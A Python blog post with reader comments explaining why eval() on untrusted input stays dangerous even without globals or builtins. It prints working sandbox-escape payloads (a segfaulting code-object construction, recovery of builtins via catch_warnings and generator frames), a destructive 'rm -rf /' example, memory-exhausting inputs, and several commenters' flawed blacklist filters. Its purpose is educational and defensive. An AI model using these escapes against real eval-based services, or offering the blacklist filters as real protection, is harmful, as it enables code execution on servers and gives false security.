Eval really is dangerous

Wednesday 6 June 2012

Python has an eval() function which evaluates a string of Python code:

assert eval("2 + 3 * len('hello')") == 17

This is very powerful, but is also very dangerous if you accept strings to evaluate from untrusted input. Suppose the string being evaluated is “os.system(‘rm -rf /’)” ? It will really start deleting all the files on your computer. (In the examples that follow, I’ll use ‘clear’ instead of ‘rm -rf /’ to prevent accidental foot-shootings.)

Some have claimed that you can make eval safe by providing it with no globals. eval() takes a second argument which are the global values to use during the evaluation. If you don’t provide a globals dictionary, then eval uses the current globals, which is why “os” might be available. If you provide an empty dictionary, then there are no globals. This now raises a NameError, “name ‘os’ is not defined”:

eval("os.system('clear')", {})

But we can still import modules and use them, with the builtin function __import__. This succeeds:

eval("__import__('os').system('clear')", {})

The next attempt to make things safe is to refuse access to the builtins. The reason names like __import__ and open are available to you in Python 2 is because they are in the __builtins__ global. We can explicitly specify that there are no builtins by defining that name as an empty dictionary in our globals. Now this raises a NameError:

eval("__import__('os').system('clear')", {'__builtins__':{}})

Are we safe now? Some say yes, but they are wrong. As a demonstration, running this in CPython will segfault your interpreter:

s = """
(lambda fc=(
    lambda n: [
        c for c in
            ().__class__.__bases__[0].__subclasses__()
            if c.__name__ == n
        ][0]
    ):
    fc("function")(
        fc("code")(
            0,0,0,0,"KABOOM",(),(),(),"","",0,""
        ),{}
    )()
)()
"""
eval(s, {'__builtins__':{}})

Let’s unpack this beast and see what’s going on. At the center we find this:

().__class__.__bases__[0]

which is a fancy way of saying “object”. The first base class of a tuple is “object”. Remember, we can’t simply say “object”, since we have no builtins. But we can create objects with literal syntax, and then use attributes from there.

Once we have object, we can get the list of all the subclasses of object:

().__class__.__bases__[0].__subclasses__()

or in other words, a list of all the classes that have been instantiated to this point in the program. We’ll come back to this at the end. If we shorthand this as ALL_CLASSES, then this is a list comprehension that examines all the classes to find one named n:

[c for c in ALL_CLASSES if c.__name__ == n][0]

We’ll use this to find classes by name, and because we need to use it twice, we’ll create a function for it:

lambda n: [c for c in ALL_CLASSES if c.__name__ == n][0]

But we’re in an eval, so we can’t use the def statement, or the assignment statement to give this function a name. But default arguments to a function are also a form of assignment, and lambdas can have default arguments. So we put the rest of our code in a lambda function to get the use of the default arguments as an assignment:

(lambda fc=(
    lambda n: [
        c for c in ALL_CLASSES if c.__name__ == n
        ][0]
    ):
    # code goes here...
)()

Now that we have our “find class” function fc, what will we do with it? We can make a code object! It isn’t easy, you need to provide 12 arguments to the constructor, but most can be given simple default values.

fc("code")(0,0,0,0,"KABOOM",(),(),(),"","",0,"")

The string “KABOOM” is the actual bytecodes to use in the code object, and as you can probably guess, “KABOOM” is not a valid sequence of bytecodes. Actually, any one of these bytecodes would be enough, they are all binary operators that will try to operate on an empty operand stack, which will segfault CPython. “KABOOM” is just more fun, thanks to lvh for it.

This gives us a code object: fc(“code”) finds the class “code” for us, and then we invoke it with the 12 arguments. You can’t invoke a code object directly, but you can create a function with one:

fc("function")(CODE_OBJECT, {})

And of course, once you have a function, you can call it, which will run the code in its code object. In this case, that will execute our bogus bytecodes, which will segfault the CPython interpreter. Here’s the dangerous string again, in more compact form:

(lambda fc=(lambda n: [c for c in ().__class__.__bases__[0].__subclasses__()
    if c.__name__ == n][0]): fc("function")(fc("code")(0,0,0,0,"KABOOM",(),
    (),(),"","",0,""),{})())()

So eval is not safe, even if you remove all the globals and the builtins!

We used the list of all subclasses of object here to make a code object and a function. You can of course find other classes and use them. Which classes you can find depends on where the eval() call actually is. In a real program, there will be many classes already created by the time the eval() happens, and all of them will be in our list of ALL_CLASSES. As an example:

s = """
[
    c for c in
    ().__class__.__bases__[0].__subclasses__()
    if c.__name__ == "Quitter"
][0](0)()
"""

The standard site module defines a class called Quitter, it’s what the name “quit” is bound to, so that you can type quit() at the interactive prompt to exit the interpreter. So in eval we simply find Quitter, instantiate it, and call it. This string cleanly exits the Python interpreter.

Of course, in a real system, there will be all sorts of powerful classes lying around that an eval’ed string could instantiate and invoke. There’s no end to the havoc that could be caused.

The problem with all of these attempts to protect eval() is that they are blacklists. They explicitly remove things that could be dangerous. That is a losing battle because if there’s just one item left off the list, you can attack the system.

While I was poking around on this topic, I stumbled on Python’s restricted evaluation mode, which seems to be an attempt to plug some of these holes. Here we try to access the code object for a lambda, and find we aren’t allowed to:

>>> eval("(lambda:0).func_code", {'__builtins__':{}})
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<string>", line 1, in <module>
RuntimeErrorfunction attributes not accessible in restricted mode

Restricted mode is an explicit attempt to blacklist certain “dangerous” attribute access. It’s specifically triggered when executing code if your builtins are not the official builtins. There’s a much more detailed explanation and links to other discussion on this topic on Tav’s blog. As we’ve seen, the existing restricted mode it isn’t enough to prevent mischief.

So, can eval be made safe? Hard to say. At this point, my best guess is that you can’t do any harm if you can’t use any double underscores, so maybe if you exclude any string with double underscores you are safe. Maybe...

Update: from a thread on Reddit about recovering cleared globals, a similar snippet that will get you the original builtins:

[
    c for c in ().__class__.__base__.__subclasses__()
    if c.__name__ == 'catch_warnings'
][0]()._module.__builtins__

Comments

[gravatar]
Great in-depth investigation. When I've talked about this in the past (and in 2 days at PyGotham) I've always kind of hand-waved about the risks of eval() and exec (which I believe has all of the same risks inherent?), but now I can just point people here. Thanks for saving me some work!
[gravatar]
There's an interesting attempt at a restricted python: https://github.com/haypo/pysandbox .

I used it in a chatbot once to allow people to eval simple python statements: https://github.com/llimllib/pyphage/blob/master/plugins/eval.py

While it was vulnerable to DOS (the timeout function did not work properly on memory intensive functions: https://github.com/haypo/pysandbox/issues/10 ), I let some pretty serious python hackers have a go at it and they weren't able to break it.

I wouldn't trust it on a for-real server, obviously, but it was good enough for the task I set out to accomplish in that scenario.
[gravatar]
Reading this, I was confused. Of course eval() (and exec()) are dangerous if you don't trust the strings to be evaluated.

The article seems to be missing a basic stipulation, perhaps "running untrusted code is dangerous". You seem to be trying to prove that no matter what you do, you can't fully isolate and sanitize untrusted code. OK, I buy that. But I think the article needs a liberal sprinkling of "... for untrusted code/input/source".

eval() and exec() are perfectly safe for trusted code, useful and even necessary on occasion (e.g. dynamic programming). Just never *ever* use them with untrusted input.
[gravatar]
Sadly, eval can also evaluate... eval. So the double-underscore trick doesn't work:
eval('eval("()._" + "_class_" + "_._" + "_bases_" + "_[0]")')
type 'object'
[gravatar]
The solution I'd use if you need this is to use the PyPy sandbox. It isn't quite ready for use, but it's pretty close, and it's fully software virtualized so much safer than eval.

Incidentally, Ned himself did some work on it to speed up the startup a few months ago. That's still the main area that needs work, too.

Also, using eval to be "dynamic" is icky.
[gravatar]
> At this point, my best guess is that you can't do any harm if you can't use any double underscores, so maybe if exclude any string with double underscores you are safe.

You could always concatenate single underscores. But if you prevent all direct accesses to dunder-methods and dunder-attributes (__subclasses__ in this case, and the indirect access via __getattribute__) this threat should be mostly mitigated. Far's I can tell, this means walking the bytecode and forbidding all LOAD_ATTR to a dunder method or attribute.

> Sadly, eval can also evaluate... eval.

Eval's a builtin, if you remove all builtins you can't eval eval:
>>> eval('eval("()._" + "_class_" + "_._" + "_bases_" + "_[0]")', {'__builtins__': {}})
Traceback (most recent call last):
  File "", line 1, in 
  File "", line 1, in 
NameError: name 'eval' is not defined
[gravatar]
The easy (to type) related answer is "Use an OS with RBAC and configure it properly."
[gravatar]
Masklinn: aha, of course! My mistake. Thanks :)
[gravatar]
> walking the bytecode and forbidding all LOAD_ATTR to a dunder method or attribute.

Thought about it for a bit longer that time, you don't actually need to walk the bytecode, just look in co_names and forbid any dunder name in it (this will catch access to user-created ones as well, but I'm not sure there's any reason to care).
[gravatar]
ast.literal_eval() is a useful alternative for one common use of eval() - to evaluate literal expressions. For example you can convert the string representation of a list into a real list:
>>> ast.literal_eval('[2, 3, "some list"]')
[2, 3, 'some list']
http://docs.python.org/library/ast.html#ast.literal_eval
[gravatar]
eval() is not evil, the os module is not evil, only some functions of the os module are dangerous. I wrote the pysandbox project which installs a lot of protections in the CPython interpreter to hide dangerous function but also any way to get access to these functions. For example, you can give access to the os.urandom() function if you enable the "random" feature of pysandbox. You get an os module with only one function: urandom().

https://github.com/haypo/pysandbox

Bill Mill already mentionned pysandbox.

"While it was vulnerable to DOS (the timeout function did not work properly on memory intensive functions: https://github.com/haypo/pysandbox/issues/10 ),"

I'm working on a new version (1.6) which runs untrusted code in a subprocess. I reintroduced the timeout option, it is now safe (and implemented completly differently).
[gravatar]
Christian Heimes 3:55 PM on 6 Jun 2012
I'm using a modified version of seval from an example at activestate for simplistic restricted Python. The code uses the compiler package and a custom AST walker to verify the code. You can disable certain keywords like raise or forbid access to attributes and objects.

Here is my modified version: http://pastebin.mozilla.org/1657291
[gravatar]
Hey thanks. http://lucumr.pocoo.org/2011/2/1/exec-in-python/ was also a good read. I've heard about some pretty cool things done with AST test case function invocation introspection. I believe Sage has a few examples of walking the AST.
[gravatar]
@David Goodger: Yes, you are right, I meant, "safe for untrusted input." I've added that clause to the opening paragraph to make it clearer.

About sandboxes, @lahwran is right, we've worked on the PyPy sandbox, though this investigation was not to try to fix eval, but instead to find a convincing example for people who thing eval can be fixed for untrusted input.

Everyone else, thanks for the interesting pointers and suggestions.
[gravatar]
Eval'ing arbitrary string is like sql.exec'ing arbitrary string. An obvious security hole, since knowing of security, means parsing and understanding the string to look for malicious code.

The philosophy for safe eval'ing should be like SQL prepare : using place holders with validations, or ... being imaginative :
eval("dispatch_table[%s](*%s,**%s)") % func, loads(table_as_json),loads( dict_as_json)

If we do so, the advantage are :
- with a dispatch table we can limit the safe available functions, and if dispatch keys are easy ([a-zA-Z]{8,12}), then, escaping seems very hard ;
- if we use named argument serialized in json it would be easier to avoid active charge in the arguments (only «passive data» are json'able).


ofc it seems very reductive (it looks like we cannot build complex functions trees), unless you notice that if the dispatch table is global, then, dispatch table keys can also be passed as arguments, with arguments.

Okay, it looks like LISP. But all safe parsing problem seems to point to a LISP'like solution.
[gravatar]
Slightly off-topic, but just to cconfirm I understand: It's for these kinds of reasons that I shouldn't be importing a Python source file as my application's config file (because if a user lets malicious input into the config file, then my application will execute it.) So I should be using ConfigObj instead, is that still a recommended route these days?
[gravatar]
@Jonathan: an important point about "untrusted input" is, who is your user, where are they, and what damage could they do if you ran code from them? For example, on a desktop application, the program is running on the user's own machine. If they try to "rm -rf /", they will be deleting their own files. Perhaps not something you need to be concerned with. If you're building a web service, then the user is anyone on the internet, and they could destroy your server, a much more dangerous proposition.
[gravatar]
@Ned, thanks for that clarification, which makes sense on one level, but on the other hand: If my application was responsible for deleting all of a user's Desktop files (or many users), then while that is less serious to me and my business, it's obviously more serious to the affected users. I'm not yet convinced that it's something I don't need to worry about. I guess it boils down to: is ever a time when an attacker is not able to execute arbitrary (Python) code, but is able to insert arbitrary Python code into my application's appropriately-permissioned config file? My application would then execute this code, and be blamed as one link in the chain which created the exploited security hole. But if this scenario isn't actually a threat, then I'll continue to store my application config in Python source and effectively 'eval' it when my application runs.
[gravatar]
Is eval without _ (underscore), . (dot) [, ] (sharp parenthesis) , " and ' (double-quote and single-quote) dangerous too?
[gravatar]
Almost certainly. There are usually ways to get other values without entering, say, " - but even short of that, there's _always_ the risk of bugs in the interpreter. There are all sorts of things that aren't tested because people don't use the interpreter that way.

If you want serious, hardcore foreign-code safety, you'll need something like the pypy sandbox or an OS-level thing like virtualization. and even that is vulnerable to some things, apparently people are stealing encryption keys from neighboring VMs now.
[gravatar]
@Janus: it depends what kind of risk you're talking about. For example, "9**9**9**9**9" will consume all your memory, and bugs like http://bugs.python.org/issue14010 exist and can be exploited.
[gravatar]
Let's consider DoS a non-issue. But I don't need * so I'll disallow it anyway.

I currently use the following cleaner (don't worry, it's not a serious project):
cleancode = lambda x: re.sub("[^0-9A-z _\^|&()]","",x)
Every single exploit I have seen have used [ or . or *. I just want to evaluate boolean literals in a simple way. ast.literal_eval is not really evaluating, just parsing. I have yet to see a non-DoS exploit using the character set above...

I'll PayPal € 5 to the first person that shows me a non-DoS exploit in under 100 characters that survives the filter above.
[gravatar]
(no builtins of course, only Python 3.2+)
[gravatar]
Try

((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((1))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

s_push: parser stack overflow
Traceback (most recent call last):
File "", line 1, in
MemoryError

It's not a crash, but a funny error, and the code matchs your regex ;)
[gravatar]
What would be a Python 3 version? It seems that code takes 13 arguments instead of 12. I'm curious if it still sefgaults.
[gravatar]
@Aaron: it does still segfault, you just have to provide one more argument, and make some of them byte strings:
(0,0,0,0,0,b"KABOOM",(),(),(),"","",0,b"")
[gravatar]
Vladislav Stepanov 2:14 PM on 8 May 2014
Hi, Ned!
I've translated your post into russian, you can find it here: http://habrahabr.ru/post/221937/
Is it ok for you? Sorry for not asking in advance:(
[gravatar]
Actually there is way to protect yourself against that issue and please correct me if I am wrong:

Using ast.parse and then searching for any system attribute invocation you can detect a problematic code and block it from being executed. One also has to block the exec statement though, here an example:
def check_ast_node_is_safe(node):
    '''
    Check that the ast node does not contain any system attribute calls
    as well as exec call (not to construct the system attribute names with strings).

    eval() and exec() function calls should not be a problem, as they are not exposed
    in the globals and __builtins__

    >>> node = ast.parse('def __call__(): return 1')
    >>> node == check_ast_node_is_safe(node)
    True

    >>> check_ast_node_is_safe(ast.parse('def m(): return ().__class__'))
    Traceback (most recent call last):
        ...
    InvalidEvalExpression


    >>> check_ast_node_is_safe(ast.parse('def horror(g): exec "exploit = ().__" + "class" + "__" in g'))
    Traceback (most recent call last):
        ...
    InvalidEvalExpression

    '''

    for n in ast.walk(node):
        if isinstance(n, ast.Attribute):
            if n.attr.startswith('__'):
                raise InvalidEvalExpression()
        elif isinstance(n, ast.Exec):
            raise InvalidEvalExpression()
    return node

def safe_eval(expr, **kwargs):
    '''
    Safely execute expr (...an excerpt...)
    '''
    ...
    g = {'__builtins__': {}, 'object': object, '__name__': __name__}
    # __builtins__ should be masked away to disable builtin functions
    # object is needed if the NewStyle class is being created
    # __name__ is needed to be able to complie a class
    g.update(kwargs)

    node = compile(expr, '', 'exec', ast.PyCF_ONLY_AST | compiler.consts.CO_FUTURE_PRINT_FUNCTION)
    node = check_ast_node_is_safe(node)
    
    cc = compile(node, '', 'exec')  # can be nicely cached
    l = {}
    exec (cc, g, l)
    ...

[gravatar]
Hi,

I wanted to use eval in my code, but I found the drawbacks of eval, so I found my own way, but I wanted to check can we break this code. Here I don't want arithmetic operations.

def hack():
    print("You can't hack my code.")
    return "break";

str1 = "lambda open read + - * / % ** // "
str2 = "().__class__.__bases__[0].__subclasses__()"
try:
    print(eval(str1.replace('()', 'hacker').replace('lambda', 'hacker').replace('open', 'hacker').replace('**', 'hacker').replace('/', 'hacker').replace('%', 'hacker').replace('*', 'hacker').replace('+', 'hacker').replace('-', 'hacker'), {'__builtins__': {}}, {'hacker': hack()}))
except (IOError, AttributeError, SyntaxError, RuntimeError):
    print("Invalid string found")
except:
    raise
[gravatar]
Small Change :
small change =>
print(eval(
jsn['logic18'].replace('().', 'hacker()').replace('__class__', 'hacker() ').replace('lambda', 'hacker()').replace('open', 'hacker()').replace(
'**', 'hacker()').replace('/', 'hacker()').replace('%', 'hacker()').replace('*', 'hacker()').replace(
'+','hacker()').replace('-', 'hacker()'), {'__builtins__': {}},
{'hacker': hack}))
[gravatar]
@Kiran: I don't think a blacklist approach is going to work, unless you are willing to leave very little that is possible, that is, unless you make it something so weak that it is uninteresting. Also, your examples here don't make much sense. Where is the user's untrusted input?
[gravatar]
@Ned: Here If i replace "jsn['logic18']" with anything, my program must not break. In the above operation I am not allowing import or instantiate any object except given local objects and If someone want to break using arithmetic operations like "9**9**9**9**9", "1/0", 1/(10 *0), ... etc., still my code must not break. I restricted access and arithmetic failures, Now I can call any local functions using my input string.
[gravatar]
@Kiran: this technique isn't giving you any safety. You replace "().", but what about "( )."? or "( ) . "? I'm not sure you've read this blog post carefully: there are many ways to cause mischief, you can't prevent them all with a blacklist.
[gravatar]
@Ned: I have replace '__class__' to blacklist, do you have any other ways to mischief the eval.
[gravatar]
You are thinking about this wrong. This is not simply hard, it effectively cannot be done. do not use eval. if you want to run math, then make your own language, with your own parser, and your own runner - it isn't actually very hard with the help of something like parsley. if you eval foreign code, then you *will* lose. as long as you are using eval, I will be able to find a way through it. I ran through your code and tested attacks until I found one that worked, with all the restrictions; at least one exists, and I will not tell you what it is. This approach is broken. Do not use it. If you want to be able to run python code remotely, check out the pypy sandbox, or use one of the os-level sandboxes. Do not use eval. Presumably someone linked you to this page; they did so for a reason. Do not use eval. Do not use exec. Do not run foreign python code without manually checking it.

Abandon hope, all ye who eval foreign code.
[gravatar]
despite that you claim to have disallowed these, and despite running in restricted mode, your example has ways for me to:
- make arbitrary functions
- import any module I like
- call any function that is available outside the sandbox - any function, not just built in ones
- replace any code outside the sandbox
- crash cpython in one of a variety of ways

you can't do it. if you deploy this, someone will break into it.

Here's some code you can use that actually-safely does an eval with foreign code:

def hack():
    print("You can't hack my code.")
    return "break";

str1 = jsn["logic18"]
try:
    str1 = "" # to make sure it's safe to eval
    print(eval(str1))
except (IOError, AttributeError, SyntaxError, RuntimeError):
    print("Invalid string found")
except:
    raise
[gravatar]
Extremely interesting article. But it begs the question:
Has this been tested on a machine?
Or is this from a purely 'mathematical'(?) standpoint?
Did you arrive at this based on your knowledge of the behaviour of python functions?
[gravatar]
@Nag: of course it's been tested on machine. You can test it yourself. There was plenty of experimentation to arrive at the final construction.
[gravatar]
I simply (naive) redefined eval(). Works for what I am up to -- there is no longer a there, there.
[gravatar]
Possible solution when:
- You have a small subset of the language, such as a calculator, maybe some numpy stuff, etc...
- You don't want to spend time implementing the language (because you are lazy and want it all in under 15 lines of code)

Use ast to validate, and if it passes, eval it.

Whitelist instead of blacklist (because blacklisting only works if you are comprehensive, and I don't trust myself to be comprehensive). If you accidentally omit something in a whitelist you lose functionality. If you accidentally omit something in a blacklist, you have a bigger problem. It's like trying to make a lock that specifically resists each skeleton key you know about.

You need two whitelists: an ast node whitelist and a name whitelist.

To save yourself a headache, generate your node whitelist like this:
  sample = 'Foo(a[b] + a * a / a // a ** a % a ^ a & a | a and (a != b or c == d))'
  node_whitelist = set([x.__class__.__name__ for x in ast.walk(ast.parse(sample))])
... that way if you forgot something, you just add it to your sample. Just add syntax that you actually need, and be mindful how that syntax could be used (in this example attribute access is not included, as that involves additional care).

Your symbol whitelist might come from a module or whatever. Probably best to do it by hand. Just make sure you are aware of the contents and that it doesn't have stuff like '__dict__' in there, and think whitelist, not blacklist.
  name_whitelist = ['sin', 'cos', 'pi', ...]
The validation test looks something like:
def safe_eval(s, context)
  nodes = set([x.__class__.__name__ for x in ast.walk(ast.parse(expr))])
  names = set([x.id for x in ast.walk(ast.parse(expr)) if x.__class__.__name__ == 'Name'])
  bad = (nodes - node_whitelist) | (names - name_whitelist )
 
  if bad:
    raise ValueError('Illegal use of {} in expression'.format(list(bad)[0]))

  return eval(s, context)
Note that if I had whitelisted attribute access (by explicitly by including "a.b" in sample expression), I'd need to implement an attribute whitelist to check against set([x.attr for x in ast.walk(ast.parse(expr)) if x.__class__.__name__ == 'Attribute']). But for this use case, attributes are not necessary, and security seems a little simpler without them.

This won't prevent DOS attacks with various kinds of extreme math. AFAIK, that can only effectively be dealt with at the process level. I'm pretty sure there is no lexical approach to preventing extreme math in a sufficiently useful tool. And I acknowledge that this post is incomplete without a discussion of Gödel's theorem. Too bad.

So, other that DOS, is this solid? Please let me know of any inevitable hacks!
[gravatar]
Stefan Pochmann 8:01 PM on 22 Dec 2017
As a corollary, `input()` in Python 2 is also dangerous, probably even *more* dangerous (because it's probably much more widely used, especially by beginners, *and* because the eval-aspect isn't as obvious as it is when explicitly calling eval). But nobody seems to be talking about that. Odd.
[gravatar]
Stefan Pochmann 8:11 PM on 22 Dec 2017
Hmm, on the other hand, I guess `input()` is typically only used where the user is the owner of the machine, not an adversary. While `eval()` might be more likely to get used on strings coming from other people.
[gravatar]
lahwran or any other skeptics, if you are following, I'm curious to see your rebuttal to my previous post.

Not impossible at all. Easy to implement safe-eval with correct thinking.

It only appears to be impossible because there are so many examples of failed attempts based on a flawed approach, which is to disallow (blacklist) dangerous strings. That approach can't work because the set of hacking strategies is impossible to enumerate.
[gravatar]
"my best guess is that you can’t do any harm if you can’t use any double underscores, so maybe if you exclude any string with double underscores you are safe."

Simply checking for "__" in the string doesn't seem to be sufficient. You can access the frame object of a generator expression without any double-underscores, and from there, access the globals of any frame higher up in the program. The only tricky part is that the complete frame object hierarchy is only accessible when the generator is executing, so you need a little self-referential trickery if you're in an `eval` and have no access to assignment. Proof of concept:
s = "q = (q.gi_frame.f_back.f_back.f_globals for _ in (1,)); builtins = [*q][0]['_' + '_builtins_' + '_']; builtins.print('Gotcha:', builtins.dir(builtins))"
exec(s, {'__builtins__': {}})
On my machine, this prints all the builtins that the attacker can now access, from `ArithmeticError` to `zip`.

Here's the same approach using `exec`, which is a little more readable since a self-referential generator expression is trivial if you can use an assignment statement:
s = "q = (q.gi_frame.f_back.f_back.f_globals for _ in (1,)); builtins = [*q][0]['_' + '_builtins_' + '_']; builtins.print('Gotcha:', builtins.dir(builtins))"
exec(s, {'__builtins__': {}})
[gravatar]
Oops, typo in my previous message. The first code block was supposed to be:
s = "(lambda b: b.print('gotcha:', b.dir(b)))([*([x.append((x[0].gi_frame.f_back.f_back.f_globals for _ in (1,))) or x[0] for x in [[]]][0])][0]['_' + '_builtins_' + '_'])"
eval(s, {'__builtins__': {}})
[gravatar]
As I mentioned in my previous post, blacklisting (e.g. attempting to disallow double underscore) is futile. You have to whitelist instead (i.e. describe what is allowed, and keep that limited).
[gravatar]
This article (and comments) is very informative! Thank you for sharing!


I have an idea of making safe_eval. Simply disallow the usage of dot "." and f-strings


I an thinking of using something like

def safe_exec(st): #oversimplified
    if ("." in st) or ("f\"" in st):
        raise ValueError
    return exec(st, {'__builtins__': {}})
This is indeed not too restrictive. Just forget about things like arr.append(ele), and use instead the purely functional programming paradigm (map, reduce, yield) + making use of lazy evaluation.

The reason this works is because ultimately you get __builtins__ from either the attributes of an object, or from a dictionary. Disallowing dot eliminates the first possibility. I don't think it is possible to directly get __builtins__ from dictionaries. If it is possible, we can statically replace the [] operator f[x] by get(f, x), and monitor the behavior of get() during run time
[gravatar]
blacklisting f-stings is prolly unnecessary. I was thinking of f"{eval('()' + chr(46) + '__class__')}", but eval is not available without builtins
[gravatar]
@Cocoshark, you are mostly OK if you disable attribute access and f-strings. You also have to make sure you disallow certain builtins like eval itself. Even so, there are still potential ways that people can do nasty things to your machine. For example, eval('10**10**100') will run until all the memory on the system is consumed and then crash. See https://stackoverflow.com/questions/35804961/python-eval-is-it-still-dangerous-if-i-disable-builtins-and-attribute-access
[gravatar]
Ty for your reply!

An improvement to this approach is whitelisting certain attribute access.

whitelist = ["append", "split", "join", ...]

whitelist_pattern = ".(append|split|join)[^a-zA-Z0-9_]"

pattern = ".[a-zA-Z0-9_]+[^a-zA-Z0-9_]"

def safety_check(s):
return count-pattern-matches == count-whitelist-pattern-matches

Finally run it in a separate process and use cggroup to control its memory/time assumption...

It is a very cheap option (in terms of execution time, management overhead & $$$). Running it in a separate virtual machine requires substantially more computing resources and I simply can't afford it
[gravatar]
What if you did this:

input_string = input_string.replace("("," ("))
result = eval(input_string,{"__builtins__":{}},{})

(That is, put a space in front of all the parenthesis.)
[gravatar]
@David, I don't see how adding a space can help. Python executes "f()" and "f ()" exactly the same.
[gravatar]
@ken (i say four years later... sorry!), that might maybe actually be good enough with enough effort maintaining the allow list, but i don't feel up to doing a full audit of every single operation you used. the fundamental problem with eval is unintuitively high surface area combined with python's complete lack of privacy and high runtime mutability.

while allow rules (as opposed to deny rules) would be the right approach in the abstract, every single thing you allow is a potential security hole - at some point of few exposed functions you may be able to reduce it to only as risky as accepting any other untrusted input, and my original recommendation was to make a compiler or interpreter that you can guarantee has safe output; in some sense that's effectively what you're doing. however, the problem is that python has many normally-hidden operations that allow you to cause unusual changes in behavior, and even if you get your allow rules to apply to the code without any correctness issues, you still end up having to maintain a mental blacklist of functions to not expose.

unfortunately, the recommendation to use the pypy sandbox has to be rescinded simply because that project didn't get maintenance momentum. if you must do remote code execution as part of your normal functionality, and you cannot simply implement a hyper minimal safe language in rust or something, i would very strongly recommend thorough defense in depth. run it in an unprivileged docker container in a vm on a host that you can erase easily and does not have any authorizations to anything that is a risk if compromised.

btw how do i unsubscribe from this, ned ?
[gravatar]
@Ned Batchelder: thanks for detailed contribution to the eval discussion and your responses to commenters.
I liked @David Goodger 10:26 AM on 6 Jun 2012 comment about untrusted text and your response but with mdns https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval#never_use_eval! they seem to be saying that the string can never be trusted.
As if everyone has stuff running on their browser waiting for an errant eval as the only way they can do bad stuff "as the user "(on the browser). Surely this is not true and really there are only 3 ways things can go wrong:
* your eval gets a string from the user and does some the the user could do any way
* the users browser is completely compromised and bad-guy can do everything any way.
* your code is going out of its way to get compromised text and then evaling it
And if you are not doing the last there is no problem
[gravatar]
@chad nash. As I understand it, using eval can perform many actions that the user would not normally be able to do, and as such, strings obtained from the user are the definition of "untrusted input".
[gravatar]
@chad: you linked to a page about JavaScript. In the Python context, your Python code will be running on a server. If you eval a string from the user, it will be executed at the server, not on the user's computer, so it isn't "something the user could do anyway."
[gravatar]
@Ned thanks for quick response.
On the server that is totally right.
On the browser I am unsure if "using eval can perform many actions that the user would not normally be able to do" is correct. I would love an example.
It might be true that eval allows users to run code that might be more complicated to set up and run from the console as it gives access to context more easily. However, as browsers have debuggers and break points context can be got that way.
The only thing I am left with is that eval might make it easier to find that context than it is with breakpoints.
[gravatar]
@ned I nearly found a reason but only argued for "dont run eval of text that does not conform to the same you want on a server"

From: https://security.stackexchange.com/questions/94017/what-are-the-security-issues-with-eval-in-javascript

@StackTracer, a malicious link does not necessarily mean a link to a malicious website. In this context I believe mcgyver5 was referring to something like yourwebsite.com/?someParam=DoMaliciousThings where somewhere on your page you have a statement like eval(someParam) (highly simplified). That would be considered a reflected XSS attack since I could send you a link like that and when you open it your browser would execute my malicious javascript through the eval. Something like that looks more reasonable when you consider it could be combind with url encoding or shortened urls. – S.C. Jul 15 '15
[gravatar]
@ned the bottom 2 answers taken together on https://security.stackexchange.com/questions/94017/what-are-the-security-issues-with-eval-in-javascript might be the best so far
together they mean:

who can be bothered securing either
1 the data you accept from Alice or
2 the shape of the the text you run in eval on Bobs browser
just to stop an eval you run on Bobs browser containing malicious code that you accepted from Alice and used to create the text you are evaling when you can just use Function (I added this last bit myself)

the arguments against that are :
* you always have to sanitise the text you get from Alice and store in a DB, and
* basically it is really easy to protect eval just like you protect from sql injection build it where the unknown text is parameters that have to be only alphanumeric.
[gravatar]
@ned another possible reason to not use eval on a client.

With sql injection if you stuff up then YOUR DB is screwed but you have backups

With eval "injection" if you stuff up YOUR USERS are screwed and they don't always have backups and sometimes cant have backups. For example they cant have a backup of the money in their bank account that you might have helped compromise
[gravatar]
@chad: you still seem focused on "eval in a browser." That is not what this page is about at all.
[gravatar]
@Ned
yep that was what I was focussed on.
Sorry if I missed the point.

My main reasons were (are now):
* eval in the backed is pretty much the same as sql in the backend for which there is a simple accepted solution
* JS in the backend is not something I would ....(though I might use python)
* eval in the browser is what most discussions on this discuss
* ARRG - I saw this page as what I wanted and failed to let the the first line "Python has an eval() function" sink in - sorry again

though I did work out my thoughts on MY PROBELM :)
[gravatar]

Try:

theCode = read_code_from_user()
theCode = """
import sys
sys.path = None
sys.modules = None
del sys
__import__ = exec = eval = "undefined"
"""+theCode
eval(theCode,{'__builtins__':{}},{})

Plus we can spawn it in a seperate process so crashes can be detected and handled.Can it damage the system with THESE precautions?Or can it at most crash the process?

[gravatar]

@SomePythonGuy: you should try your code! After correcting a few mistakes (you need exec, not eval; you can’t import sys if you don’t have __import__ in your builtins), it will still crash your interpreter.

The example crasher given in the blog post doesn’t use any builtin names, and doesn’t import anything. Removing builtins and modules won’t protect you.

[gravatar]

BTW, for recent Python versions the arguments to “code” are now:

0,0,0,0,0,0,b"KABOOM",(),(),(),"","",0,b"",
[gravatar]

I don’t understand how @Kevin’s expression works. It seems to work only if there is nothing (or spaces) at the position of “@” below:

[*( [x.append(x[0].gi_frame.f_back.f_back.f_globals for _ in (1,)) or x[0]  for x in [ [ @ ] ]][0] )][0]

If I replace “@” with a list or tuple, the expression will give its first element. Is this a bug in the Python interpreter? I tested it with Python 3.6.9.

Is there a clearer way to access a generator “while it is executing” as Kevin described, if that is the purpose of the strange expression? I imagine there may be links to all frames in the stack while a generator is executing to deal with exception catching. But if the mechanism in this example is an exfiltration of the interpreter’s internal data out to the scipt that has no utility other than as a hack, then I think it is a security issue.

[gravatar]

I will answer my own question.

The key to the trick is that a generator expression binds to its closure like a function. So it can “yield” itself. This can be demonstrated simply by:

x = []
x.append(x[0].gi_frame.f_back.f_globals for _ in (1,))
x[0].send(None) == globals()

The rest of the complications in Kevin’s example were to execute everything in a single “eval()”, so that the content fit exactly the original subject.

Add a comment:

Ignore this:
Leave this empty:
Name is required. Either email or web are required. Email won't be displayed and I won't spam you. Your web site won't be indexed by search engines.
Don't put anything here:
Leave this empty:
Comment text is Markdown.